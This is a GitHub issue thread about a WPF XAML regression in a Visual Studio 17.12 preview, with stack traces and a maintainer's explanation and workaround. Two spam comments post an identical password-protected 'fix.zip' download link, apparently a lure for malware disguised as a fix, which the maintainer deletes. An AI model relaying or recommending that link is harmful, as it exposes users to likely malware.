### ISSUE TITLE
Version 17.12.0 Preview 1.0 - Issues with XAML like XamlParseException and IndexOutOfRangeException

### ISSUE THREAD

**Issue by Symbai** [dotnet/wpf#9647]
### Description

Since I updated VS I get total weird issues. I can build my app without problem but if I launch it outside of VS I get errors like:

```
System.Windows.Markup.XamlParseException: Line number “69” and line position “36” of “An exception was thrown during the initialization of ‘System.Windows.Controls.MenuItem’.”.

 ---> System.Xaml.XamlParseException: Unexpected data record in the BAML data stream. An attempt is made to add setters (no collection or no TypeConverter available).

   at System.Windows.Baml2006.Baml2006Reader.InjectPropertyAndFrameIfNeeded(XamlType elementType, SByte flags)

   at System.Windows.Baml2006.Baml2006Reader.Process_ElementStart()

   at System.Windows.Baml2006.Baml2006Reader.ReadObject(KeyRecord record)
```

and if I run my app in VS I get errors like:

```
System.Windows.Markup.XamlParseException
  HResult=0x80131501
  Message=Line number “69” and line position “36” of “An exception was thrown during the initialization of ‘System.Windows.Controls.MenuItem’.”.
  Source=PresentationFramework
  StackTrace:
   at System.Windows.Markup.XamlReader.RewrapException(Exception e, IXamlLineInfo lineInfo, Uri baseUri)

  This exception was originally thrown on this call stack:
    [External code]

Inner exception 1:
IndexOutOfRangeException: index was outside the bounds of the array.
```

The line in XAML is:

```XAML
<MenuItem Command="{Binding OpenDirectoryCommand}" Header="Open Directory">
    <MenuItem.Icon>
        <Image Source="{StaticResource IconOpenFolder}" /> // <--- line 69
    </MenuItem.Icon>
</MenuItem>
```

The fun thing is that if I remove the control at line 69 from the XAML and run it again, the same error appears at line 67

```XAML
<MenuItem Command="{Binding OpenTargetDirectoryCommand}" Header="Open Target _Directory"> // <--- line 67
</MenuItem>
```

and when I remove the menu item completely it throws the same error at another line:

```XAML

<TextBox CommandParameter="{Binding Text, RelativeSource={RelativeSource self}}"/>

```

I changed no line of code in the app. It totally worked fine in the previous VS version. All I did was updating VS and then run the program in VS. It seems to be the XAML compiler is broken?

### Reproduction Steps

-

### Expected behavior

Works

### Actual behavior

Doesnt work

### Regression?

Yes

### Configuration

.NET SDK:
 Version:           9.0.100-preview.7.24407.12
 Commit:            d672b8a045
 Workload version:  9.0.100-manifests.baed1e37
 MSBuild version:   17.12.0-preview-24374-02+48e81c6f1

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by singhashish-wpf** [comment]
@seeronline  @qlqw233 deleting your comments as those aren't related to this bug.

@Symbai This is a regression which happened due to the changes we made for making Setter.Value as ContentProperty. The changes have been reverted and should be a part of rc2. Till then you can utilize global.json to pin the sdk version to 8 or something below preview 7, or you can upgrade to RC2 installers.
Original issue: https://github.com/dotnet/wpf/issues/9582

**Comment by singhashish-wpf** [comment]
Done

> @singhashish-wpf I've reported these spam bots. I see, thank you. Might be worth to pin the original issue until the fix is available? (With that I mean next VS update)

**Comment by Symbai** [comment]
Thanks :)
